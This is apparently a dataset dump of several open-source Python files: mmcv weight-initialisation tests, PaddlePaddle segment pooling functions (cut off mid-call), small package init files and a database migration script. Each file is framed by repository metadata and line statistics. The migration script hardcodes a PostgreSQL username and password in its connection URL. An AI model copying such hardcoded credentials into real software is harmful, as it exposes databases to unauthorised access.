e67f3f684ad7965396387dacab50a53cfa3be32b
|
[
"MIT"
] | null | null | null |
lib/backbone/__init__.py
|
sx14/BBN
|
e67f3f684ad7965396387dacab50a53cfa3be32b
|
[
"MIT"
] | null | null | null |
lib/backbone/__init__.py
|
sx14/BBN
|
e67f3f684ad7965396387dacab50a53cfa3be32b
|
[
"MIT"
] | null | null | null |
from .resnet import res50, bbn_res50
from .resnet_cifar import res32_cifar, bbn_res32_cifar, res32_cifar_mb
| 36
| 70
| 0.851852
| 18
| 108
| 4.722222
| 0.444444
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103093
| 0.101852
| 108
| 2
| 71
| 54
| 0.773196
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7c297ed983988807f27a70f8cf040487cc5d1e11
| 221
|
py
|
Python
|
src/closure_table/auth/db/manage.py
|
vyacheslav-bezborodov/dvhb
|
b3ff8bee6274c29e49f053ad8bc3f6ca050ec584
|
[
"MIT"
] | 1
|
2018-05-13T13:04:51.000Z
|
2018-05-13T13:04:51.000Z
|
src/closure_table/auth/db/manage.py
|
vyacheslav-bezborodov/closure-table-meetup
|
a606db0dbd736f4fe70cea1883649412a560902c
|
[
"MIT"
] | null | null | null |
src/closure_table/auth/db/manage.py
|
vyacheslav-bezborodov/closure-table-meetup
|
a606db0dbd736f4fe70cea1883649412a560902c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from migrate.versioning.shell import main
if __name__ == '__main__':
main(repository='src/closure_table/auth/db/', debug='False', url='postgresql://closureuser:closurepass@localhost/closuredb')
| 36.833333
| 128
| 0.760181
| 28
| 221
| 5.678571
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081448
| 221
| 5
| 129
| 44.2
| 0.783251
| 0.090498
| 0
| 0
| 0
| 0
| 0.475
| 0.41
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 6
|
7c2a4b796c918d7a2b51753c2603b0bdcc37d775
| 22,748
|
py
|
Python
|
tests/test_cnn/test_weight_init.py
|
raoshenglong/mmcv
|
e22740b1d6953d75a0acecce4455d23800b1f018
|
[
"Apache-2.0"
] | 3,748
|
2018-10-12T08:39:46.000Z
|
2022-03-31T17:22:55.000Z
|
tests/test_cnn/test_weight_init.py
|
raoshenglong/mmcv
|
e22740b1d6953d75a0acecce4455d23800b1f018
|
[
"Apache-2.0"
] | 1,637
|
2018-10-12T06:06:18.000Z
|
2022-03-31T02:20:53.000Z
|
tests/test_cnn/test_weight_init.py
|
raoshenglong/mmcv
|
e22740b1d6953d75a0acecce4455d23800b1f018
|
[
"Apache-2.0"
] | 1,234
|
2018-10-12T09:28:20.000Z
|
2022-03-31T15:56:24.000Z
|
# Copyright (c) OpenMMLab. All rights reserved.
import random
from tempfile import TemporaryDirectory
import numpy as np
import pytest
import torch
from scipy import stats
from torch import nn
from mmcv.cnn import (Caffe2XavierInit, ConstantInit, KaimingInit, NormalInit,
PretrainedInit, TruncNormalInit, UniformInit, XavierInit,
bias_init_with_prob, caffe2_xavier_init, constant_init,
initialize, kaiming_init, normal_init, trunc_normal_init,
uniform_init, xavier_init)
def test_constant_init():
conv_module = nn.Conv2d(3, 16, 3)
constant_init(conv_module, 0.1)
assert conv_module.weight.allclose(
torch.full_like(conv_module.weight, 0.1))
assert conv_module.bias.allclose(torch.zeros_like(conv_module.bias))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
constant_init(conv_module_no_bias, 0.1)
assert conv_module.weight.allclose(
torch.full_like(conv_module.weight, 0.1))
def test_xavier_init():
conv_module = nn.Conv2d(3, 16, 3)
xavier_init(conv_module, bias=0.1)
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
xavier_init(conv_module, distribution='uniform')
# TODO: sanity check of weight distribution, e.g. mean, std
with pytest.raises(AssertionError):
xavier_init(conv_module, distribution='student-t')
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
xavier_init(conv_module_no_bias)
def test_normal_init():
conv_module = nn.Conv2d(3, 16, 3)
normal_init(conv_module, bias=0.1)
# TODO: sanity check of weight distribution, e.g. mean, std
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
normal_init(conv_module_no_bias)
# TODO: sanity check distribution, e.g. mean, std
def test_trunc_normal_init():
def _random_float(a, b):
return (b - a) * random.random() + a
def _is_trunc_normal(tensor, mean, std, a, b):
# scipy's trunc norm is suited for data drawn from N(0, 1),
# so we need to transform our data to test it using scipy.
z_samples = (tensor.view(-1) - mean) / std
z_samples = z_samples.tolist()
a0 = (a - mean) / std
b0 = (b - mean) / std
p_value = stats.kstest(z_samples, 'truncnorm', args=(a0, b0))[1]
return p_value > 0.0001
conv_module = nn.Conv2d(3, 16, 3)
mean = _random_float(-3, 3)
std = _random_float(.01, 1)
a = _random_float(mean - 2 * std, mean)
b = _random_float(mean, mean + 2 * std)
trunc_normal_init(conv_module, mean, std, a, b, bias=0.1)
assert _is_trunc_normal(conv_module.weight, mean, std, a, b)
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
trunc_normal_init(conv_module_no_bias)
# TODO: sanity check distribution, e.g. mean, std
def test_uniform_init():
conv_module = nn.Conv2d(3, 16, 3)
uniform_init(conv_module, bias=0.1)
# TODO: sanity check of weight distribution, e.g. mean, std
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
uniform_init(conv_module_no_bias)
def test_kaiming_init():
conv_module = nn.Conv2d(3, 16, 3)
kaiming_init(conv_module, bias=0.1)
# TODO: sanity check of weight distribution, e.g. mean, std
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
kaiming_init(conv_module, distribution='uniform')
with pytest.raises(AssertionError):
kaiming_init(conv_module, distribution='student-t')
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
kaiming_init(conv_module_no_bias)
def test_caffe_xavier_init():
conv_module = nn.Conv2d(3, 16, 3)
caffe2_xavier_init(conv_module)
def test_bias_init_with_prob():
conv_module = nn.Conv2d(3, 16, 3)
prior_prob = 0.1
normal_init(conv_module, bias=bias_init_with_prob(0.1))
# TODO: sanity check of weight distribution, e.g. mean, std
bias = float(-np.log((1 - prior_prob) / prior_prob))
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, bias))
def test_constaninit():
"""test ConstantInit class."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = ConstantInit(val=1, bias=2, layer='Conv2d')
func(model)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 1.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 2.))
assert not torch.equal(model[2].weight,
torch.full(model[2].weight.shape, 1.))
assert not torch.equal(model[2].bias, torch.full(model[2].bias.shape, 2.))
func = ConstantInit(val=3, bias_prob=0.01, layer='Linear')
func(model)
res = bias_init_with_prob(0.01)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 1.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 3.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 2.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, res))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = ConstantInit(val=4., bias=5., layer='_ConvNd')
func(model)
assert torch.all(model[0].weight == 4.)
assert torch.all(model[2].weight == 4.)
assert torch.all(model[0].bias == 5.)
assert torch.all(model[2].bias == 5.)
# test bias input type
with pytest.raises(TypeError):
func = ConstantInit(val=1, bias='1')
# test bias_prob type
with pytest.raises(TypeError):
func = ConstantInit(val=1, bias_prob='1')
# test layer input type
with pytest.raises(TypeError):
func = ConstantInit(val=1, layer=1)
def test_xavierinit():
"""test XavierInit class."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = XavierInit(bias=0.1, layer='Conv2d')
func(model)
assert model[0].bias.allclose(torch.full_like(model[2].bias, 0.1))
assert not model[2].bias.allclose(torch.full_like(model[0].bias, 0.1))
constant_func = ConstantInit(val=0, bias=0, layer=['Conv2d', 'Linear'])
func = XavierInit(gain=100, bias_prob=0.01, layer=['Conv2d', 'Linear'])
model.apply(constant_func)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 0.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 0.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 0.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 0.))
res = bias_init_with_prob(0.01)
func(model)
assert not torch.equal(model[0].weight,
torch.full(model[0].weight.shape, 0.))
assert not torch.equal(model[2].weight,
torch.full(model[2].weight.shape, 0.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, res))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, res))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = ConstantInit(val=4., bias=5., layer='_ConvNd')
func(model)
assert torch.all(model[0].weight == 4.)
assert torch.all(model[2].weight == 4.)
assert torch.all(model[0].bias == 5.)
assert torch.all(model[2].bias == 5.)
func = XavierInit(gain=100, bias_prob=0.01, layer='_ConvNd')
func(model)
assert not torch.all(model[0].weight == 4.)
assert not torch.all(model[2].weight == 4.)
assert torch.all(model[0].bias == res)
assert torch.all(model[2].bias == res)
# test bias input type
with pytest.raises(TypeError):
func = XavierInit(bias='0.1', layer='Conv2d')
# test layer inpur type
with pytest.raises(TypeError):
func = XavierInit(bias=0.1, layer=1)
def test_normalinit():
"""test Normalinit class."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = NormalInit(mean=100, std=1e-5, bias=200, layer=['Conv2d', 'Linear'])
func(model)
assert model[0].weight.allclose(torch.tensor(100.))
assert model[2].weight.allclose(torch.tensor(100.))
assert model[0].bias.allclose(torch.tensor(200.))
assert model[2].bias.allclose(torch.tensor(200.))
func = NormalInit(
mean=300, std=1e-5, bias_prob=0.01, layer=['Conv2d', 'Linear'])
res = bias_init_with_prob(0.01)
func(model)
assert model[0].weight.allclose(torch.tensor(300.))
assert model[2].weight.allclose(torch.tensor(300.))
assert model[0].bias.allclose(torch.tensor(res))
assert model[2].bias.allclose(torch.tensor(res))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = NormalInit(mean=300, std=1e-5, bias_prob=0.01, layer='_ConvNd')
func(model)
assert model[0].weight.allclose(torch.tensor(300.))
assert model[2].weight.allclose(torch.tensor(300.))
assert torch.all(model[0].bias == res)
assert torch.all(model[2].bias == res)
def test_truncnormalinit():
"""test TruncNormalInit class."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = TruncNormalInit(
mean=100, std=1e-5, bias=200, a=0, b=200, layer=['Conv2d', 'Linear'])
func(model)
assert model[0].weight.allclose(torch.tensor(100.))
assert model[2].weight.allclose(torch.tensor(100.))
assert model[0].bias.allclose(torch.tensor(200.))
assert model[2].bias.allclose(torch.tensor(200.))
func = TruncNormalInit(
mean=300,
std=1e-5,
a=100,
b=400,
bias_prob=0.01,
layer=['Conv2d', 'Linear'])
res = bias_init_with_prob(0.01)
func(model)
assert model[0].weight.allclose(torch.tensor(300.))
assert model[2].weight.allclose(torch.tensor(300.))
assert model[0].bias.allclose(torch.tensor(res))
assert model[2].bias.allclose(torch.tensor(res))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = TruncNormalInit(
mean=300, std=1e-5, a=100, b=400, bias_prob=0.01, layer='_ConvNd')
func(model)
assert model[0].weight.allclose(torch.tensor(300.))
assert model[2].weight.allclose(torch.tensor(300.))
assert torch.all(model[0].bias == res)
assert torch.all(model[2].bias == res)
def test_uniforminit():
""""test UniformInit class."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = UniformInit(a=1, b=1, bias=2, layer=['Conv2d', 'Linear'])
func(model)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 1.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 1.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 2.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 2.))
func = UniformInit(a=100, b=100, layer=['Conv2d', 'Linear'], bias=10)
func(model)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape,
100.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape,
100.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 10.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 10.))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = UniformInit(a=100, b=100, bias_prob=0.01, layer='_ConvNd')
res = bias_init_with_prob(0.01)
func(model)
assert torch.all(model[0].weight == 100.)
assert torch.all(model[2].weight == 100.)
assert torch.all(model[0].bias == res)
assert torch.all(model[2].bias == res)
def test_kaiminginit():
"""test KaimingInit class."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = KaimingInit(bias=0.1, layer='Conv2d')
func(model)
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 0.1))
assert not torch.equal(model[2].bias, torch.full(model[2].bias.shape, 0.1))
func = KaimingInit(a=100, bias=10, layer=['Conv2d', 'Linear'])
constant_func = ConstantInit(val=0, bias=0, layer=['Conv2d', 'Linear'])
model.apply(constant_func)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 0.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 0.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 0.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 0.))
func(model)
assert not torch.equal(model[0].weight,
torch.full(model[0].weight.shape, 0.))
assert not torch.equal(model[2].weight,
torch.full(model[2].weight.shape, 0.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 10.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 10.))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = KaimingInit(bias=0.1, layer='_ConvNd')
func(model)
assert torch.all(model[0].bias == 0.1)
assert torch.all(model[2].bias == 0.1)
func = KaimingInit(a=100, bias=10, layer='_ConvNd')
constant_func = ConstantInit(val=0, bias=0, layer='_ConvNd')
model.apply(constant_func)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 0.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 0.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 0.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 0.))
func(model)
assert not torch.equal(model[0].weight,
torch.full(model[0].weight.shape, 0.))
assert not torch.equal(model[2].weight,
torch.full(model[2].weight.shape, 0.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 10.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 10.))
def test_caffe2xavierinit():
"""test Caffe2XavierInit."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = Caffe2XavierInit(bias=0.1, layer='Conv2d')
func(model)
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 0.1))
assert not torch.equal(model[2].bias, torch.full(model[2].bias.shape, 0.1))
class FooModule(nn.Module):
def __init__(self):
super().__init__()
self.linear = nn.Linear(1, 2)
self.conv2d = nn.Conv2d(3, 1, 3)
self.conv2d_2 = nn.Conv2d(3, 2, 3)
def test_pretrainedinit():
"""test PretrainedInit class."""
modelA = FooModule()
constant_func = ConstantInit(val=1, bias=2, layer=['Conv2d', 'Linear'])
modelA.apply(constant_func)
modelB = FooModule()
funcB = PretrainedInit(checkpoint='modelA.pth')
modelC = nn.Linear(1, 2)
funcC = PretrainedInit(checkpoint='modelA.pth', prefix='linear.')
with TemporaryDirectory():
torch.save(modelA.state_dict(), 'modelA.pth')
funcB(modelB)
assert torch.equal(modelB.linear.weight,
torch.full(modelB.linear.weight.shape, 1.))
assert torch.equal(modelB.linear.bias,
torch.full(modelB.linear.bias.shape, 2.))
assert torch.equal(modelB.conv2d.weight,
torch.full(modelB.conv2d.weight.shape, 1.))
assert torch.equal(modelB.conv2d.bias,
torch.full(modelB.conv2d.bias.shape, 2.))
assert torch.equal(modelB.conv2d_2.weight,
torch.full(modelB.conv2d_2.weight.shape, 1.))
assert torch.equal(modelB.conv2d_2.bias,
torch.full(modelB.conv2d_2.bias.shape, 2.))
funcC(modelC)
assert torch.equal(modelC.weight, torch.full(modelC.weight.shape, 1.))
assert torch.equal(modelC.bias, torch.full(modelC.bias.shape, 2.))
def test_initialize():
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
foonet = FooModule()
# test layer key
init_cfg = dict(type='Constant', layer=['Conv2d', 'Linear'], val=1, bias=2)
initialize(model, init_cfg)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 1.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 1.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 2.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 2.))
assert init_cfg == dict(
type='Constant', layer=['Conv2d', 'Linear'], val=1, bias=2)
# test init_cfg with list type
init_cfg = [
dict(type='Constant', layer='Conv2d', val=1, bias=2),
dict(type='Constant', layer='Linear', val=3, bias=4)
]
initialize(model, init_cfg)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 1.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 3.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 2.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 4.))
assert init_cfg == [
dict(type='Constant', layer='Conv2d', val=1, bias=2),
dict(type='Constant', layer='Linear', val=3, bias=4)
]
# test layer key and override key
init_cfg = dict(
type='Constant',
val=1,
bias=2,
layer=['Conv2d', 'Linear'],
override=dict(type='Constant', name='conv2d_2', val=3, bias=4))
initialize(foonet, init_cfg)
assert torch.equal(foonet.linear.weight,
torch.full(foonet.linear.weight.shape, 1.))
assert torch.equal(foonet.linear.bias,
torch.full(foonet.linear.bias.shape, 2.))
assert torch.equal(foonet.conv2d.weight,
torch.full(foonet.conv2d.weight.shape, 1.))
assert torch.equal(foonet.conv2d.bias,
torch.full(foonet.conv2d.bias.shape, 2.))
assert torch.equal(foonet.conv2d_2.weight,
torch.full(foonet.conv2d_2.weight.shape, 3.))
assert torch.equal(foonet.conv2d_2.bias,
torch.full(foonet.conv2d_2.bias.shape, 4.))
assert init_cfg == dict(
type='Constant',
val=1,
bias=2,
layer=['Conv2d', 'Linear'],
override=dict(type='Constant', name='conv2d_2', val=3, bias=4))
# test override key
init_cfg = dict(
type='Constant', val=5, bias=6, override=dict(name='conv2d_2'))
initialize(foonet, init_cfg)
assert not torch.equal(foonet.linear.weight,
torch.full(foonet.linear.weight.shape, 5.))
assert not torch.equal(foonet.linear.bias,
torch.full(foonet.linear.bias.shape, 6.))
assert not torch.equal(foonet.conv2d.weight,
torch.full(foonet.conv2d.weight.shape, 5.))
assert not torch.equal(foonet.conv2d.bias,
torch.full(foonet.conv2d.bias.shape, 6.))
assert torch.equal(foonet.conv2d_2.weight,
torch.full(foonet.conv2d_2.weight.shape, 5.))
assert torch.equal(foonet.conv2d_2.bias,
torch.full(foonet.conv2d_2.bias.shape, 6.))
assert init_cfg == dict(
type='Constant', val=5, bias=6, override=dict(name='conv2d_2'))
init_cfg = dict(
type='Pretrained',
checkpoint='modelA.pth',
override=dict(type='Constant', name='conv2d_2', val=3, bias=4))
modelA = FooModule()
constant_func = ConstantInit(val=1, bias=2, layer=['Conv2d', 'Linear'])
modelA.apply(constant_func)
with TemporaryDirectory():
torch.save(modelA.state_dict(), 'modelA.pth')
initialize(foonet, init_cfg)
assert torch.equal(foonet.linear.weight,
torch.full(foonet.linear.weight.shape, 1.))
assert torch.equal(foonet.linear.bias,
torch.full(foonet.linear.bias.shape, 2.))
assert torch.equal(foonet.conv2d.weight,
torch.full(foonet.conv2d.weight.shape, 1.))
assert torch.equal(foonet.conv2d.bias,
torch.full(foonet.conv2d.bias.shape, 2.))
assert torch.equal(foonet.conv2d_2.weight,
torch.full(foonet.conv2d_2.weight.shape, 3.))
assert torch.equal(foonet.conv2d_2.bias,
torch.full(foonet.conv2d_2.bias.shape, 4.))
assert init_cfg == dict(
type='Pretrained',
checkpoint='modelA.pth',
override=dict(type='Constant', name='conv2d_2', val=3, bias=4))
# test init_cfg type
with pytest.raises(TypeError):
init_cfg = 'init_cfg'
initialize(foonet, init_cfg)
# test override value type
with pytest.raises(TypeError):
init_cfg = dict(
type='Constant',
val=1,
bias=2,
layer=['Conv2d', 'Linear'],
override='conv')
initialize(foonet, init_cfg)
# test override name
with pytest.raises(RuntimeError):
init_cfg = dict(
type='Constant',
val=1,
bias=2,
layer=['Conv2d', 'Linear'],
override=dict(type='Constant', name='conv2d_3', val=3, bias=4))
initialize(foonet, init_cfg)
# test list override name
with pytest.raises(RuntimeError):
init_cfg = dict(
type='Constant',
val=1,
bias=2,
layer=['Conv2d', 'Linear'],
override=[
dict(type='Constant', name='conv2d', val=3, bias=4),
dict(type='Constant', name='conv2d_3', val=5, bias=6)
])
initialize(foonet, init_cfg)
# test override with args except type key
with pytest.raises(ValueError):
init_cfg = dict(
type='Constant',
val=1,
bias=2,
override=dict(name='conv2d_2', val=3, bias=4))
initialize(foonet, init_cfg)
# test override without name
with pytest.raises(ValueError):
init_cfg = dict(
type='Constant',
val=1,
bias=2,
override=dict(type='Constant', val=3, bias=4))
initialize(foonet, init_cfg)
| 40.621429
| 79
| 0.630913
| 3,267
| 22,748
| 4.305479
| 0.050811
| 0.056306
| 0.0728
| 0.062704
| 0.851201
| 0.821769
| 0.794042
| 0.764254
| 0.729703
| 0.698564
| 0
| 0.04772
| 0.21514
| 22,748
| 559
| 80
| 40.694097
| 0.740114
| 0.057807
| 0
| 0.630137
| 0
| 0
| 0.035484
| 0
| 0
| 0
| 0
| 0.001789
| 0.317352
| 1
| 0.045662
| false
| 0
| 0.018265
| 0.002283
| 0.070776
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7c92e10360f4d45410d8757f1fc7ecf6b8321709
| 178
|
py
|
Python
|
src/probnum/filtsmooth/particlefiltsmooth/__init__.py
|
NinaEffenberger/probnum
|
595f55f9f235fd0396d02b9a6f828aba2383dceb
|
[
"MIT"
] | 4
|
2020-12-07T11:56:48.000Z
|
2021-04-16T14:50:40.000Z
|
src/probnum/filtsmooth/particlefiltsmooth/__init__.py
|
NinaEffenberger/probnum
|
595f55f9f235fd0396d02b9a6f828aba2383dceb
|
[
"MIT"
] | 42
|
2021-04-12T08:11:41.000Z
|
2022-03-28T00:21:55.000Z
|
src/probnum/filtsmooth/particlefiltsmooth/__init__.py
|
NinaEffenberger/probnum
|
595f55f9f235fd0396d02b9a6f828aba2383dceb
|
[
"MIT"
] | null | null | null |
"""Particle filtering and smoothing."""
from ._particle_filter import ParticleFilter, effective_number_of_events
from ._particle_filter_posterior import ParticleFilterPosterior
| 35.6
| 72
| 0.865169
| 19
| 178
| 7.684211
| 0.736842
| 0.164384
| 0.246575
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078652
| 178
| 4
| 73
| 44.5
| 0.890244
| 0.185393
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7ce2e735b6f11bfc366c1fc939eaa84451bb8693
| 10,123
|
py
|
Python
|
python/paddle/incubate/tensor/math.py
|
L-Net-1992/Paddle
|
4d0ca02ba56760b456f3d4b42a538555b9b6c307
|
[
"Apache-2.0"
] | 11
|
2016-08-29T07:43:26.000Z
|
2016-08-29T07:51:24.000Z
|
python/paddle/incubate/tensor/math.py
|
L-Net-1992/Paddle
|
4d0ca02ba56760b456f3d4b42a538555b9b6c307
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/incubate/tensor/math.py
|
L-Net-1992/Paddle
|
4d0ca02ba56760b456f3d4b42a538555b9b6c307
|
[
"Apache-2.0"
] | 1
|
2021-09-24T11:23:36.000Z
|
2021-09-24T11:23:36.000Z
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddle.fluid.layer_helper import LayerHelper, _non_static_mode
from paddle.fluid.data_feeder import check_variable_and_dtype
from paddle import _C_ops
from paddle.fluid.framework import _in_legacy_dygraph, in_dygraph_mode
__all__ = []
def segment_sum(data, segment_ids, name=None):
r"""
Segment Sum Operator.
This operator sums the elements of input `data` which with
the same index in `segment_ids`.
It computes a tensor such that $out_i = \\sum_{j} data_{j}$
where sum is over j such that `segment_ids[j] == i`.
Args:
data (Tensor): A tensor, available data type float32, float64, int32, int64.
segment_ids (Tensor): A 1-D tensor, which have the same size
with the first dimension of input data.
Available data type is int32, int64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
output (Tensor): the reduced result.
Examples:
.. code-block:: python
import paddle
data = paddle.to_tensor([[1, 2, 3], [3, 2, 1], [4, 5, 6]], dtype='float32')
segment_ids = paddle.to_tensor([0, 0, 1], dtype='int32')
out = paddle.incubate.segment_sum(data, segment_ids)
#Outputs: [[4., 4., 4.], [4., 5., 6.]]
"""
if in_dygraph_mode():
return _C_ops.final_state_segment_pool(data, segment_ids, "SUM")[0]
if _in_legacy_dygraph():
out, tmp = _C_ops.segment_pool(data, segment_ids, 'pooltype', "SUM")
return out
check_variable_and_dtype(data, "X",
("float32", "float64", "int32", "int64"),
"segment_pool")
check_variable_and_dtype(segment_ids, "SegmentIds", ("int32", "int64"),
"segment_pool")
helper = LayerHelper("segment_sum", **locals())
out = helper.create_variable_for_type_inference(dtype=data.dtype)
summed_ids = helper.create_variable_for_type_inference(dtype=data.dtype)
helper.append_op(type="segment_pool",
inputs={
"X": data,
"SegmentIds": segment_ids
},
outputs={
"Out": out,
"SummedIds": summed_ids
},
attrs={"pooltype": "SUM"})
return out
def segment_mean(data, segment_ids, name=None):
r"""
Segment mean Operator.
Ihis operator calculate the mean value of input `data` which
with the same index in `segment_ids`.
It computes a tensor such that $out_i = \\frac{1}{n_i} \\sum_{j} data[j]$
where sum is over j such that 'segment_ids[j] == i' and $n_i$ is the number
of all index 'segment_ids[j] == i'.
Args:
data (tensor): a tensor, available data type float32, float64, int32, int64.
segment_ids (tensor): a 1-d tensor, which have the same size
with the first dimension of input data.
available data type is int32, int64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
output (Tensor): the reduced result.
Examples:
.. code-block:: python
import paddle
data = paddle.to_tensor([[1, 2, 3], [3, 2, 1], [4, 5, 6]], dtype='float32')
segment_ids = paddle.to_tensor([0, 0, 1], dtype='int32')
out = paddle.incubate.segment_mean(data, segment_ids)
#Outputs: [[2., 2., 2.], [4., 5., 6.]]
"""
if in_dygraph_mode():
return _C_ops.final_state_segment_pool(data, segment_ids, "MEAN")[0]
if _non_static_mode():
out, tmp = _C_ops.segment_pool(data, segment_ids, 'pooltype', "MEAN")
return out
check_variable_and_dtype(data, "X",
("float32", "float64", "int32", "int64"),
